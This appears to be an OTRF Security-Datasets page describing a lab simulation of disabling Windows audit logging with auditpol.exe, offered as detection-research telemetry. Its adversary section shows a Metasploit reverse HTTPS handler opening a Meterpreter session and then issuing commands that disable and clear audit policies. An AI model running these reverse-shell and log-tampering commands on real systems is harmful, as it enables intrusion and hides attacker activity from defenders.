Disabling Windows Event Logging via Audit Policy Modification

Metadata

Contributors	Jose Rodriguez @Cyb3rPandaH
Creation Date	2022/06/30
Modification Date	2022/08/18
Tactics	TA0005
Techniques	T1562.002
Tags	auditpol,cmd,microsoft windows security auditing

Dataset Description

After getting a shell with elevated privileges on the target, we used auditpol.exe to modify the current system and user audit policies. Success and failure events were disabled using the /set /remove /clear commands and /success /failure parameters. This dataset was generated using a Windows 10 Pro edition (Version:1903,OS Build:18362.30) and Kali Linux (Version:2022.2).

Datasets Downloads

Type	Link
Host	https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/auditpol_system_user_auditpolicy_modification.zip

Simulation Metadata

Tools

type	Name	Module
Manual	auditpol.exe	auditpol.exe

Adversary View

msf6 exploit(multi/handler) > run 
[*] Started HTTPS reverse handler on https://192.168.56.40:8443 
[*] https://192.168.56.40:8443 handling request from 192.168.56.44; (UUID: gytdwvr9) Staging x64 payload (201308 bytes) ... 
[*] Meterpreter session 3 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-18 09:56:27 -0400 
meterpreter > execute -f auditpol.exe -H -a '/set /user:pedro /category:"DS Access" /success:disable' 
Process 4392 created.
meterpreter > execute -f auditpol.exe -H -a '/set /user:pedro /category:"DS Access" /failure:disable' 
Process 6664 created. 
meterpreter > execute -f auditpol.exe -H -a '/remove /user:pedro' 
Process 4440 created. 
meterpreter > execute -f auditpol.exe -H -a '/set /category:"Account Logon" /success:disable' 
Process 472 created. 
meterpreter > execute -f auditpol.exe -H -a '/set /category:"Account Logon" /failure:disable' 
Process 2752 created. 
meterpreter > execute -f auditpol.exe -H -a '/clear /y' 
Process 7016 created. 
meterpreter > 

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/auditpol_system_user_auditpolicy_modification.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

df.groupby(['Channel']).size().sort_values(ascending=False)

References

• https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-process-creation

• https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol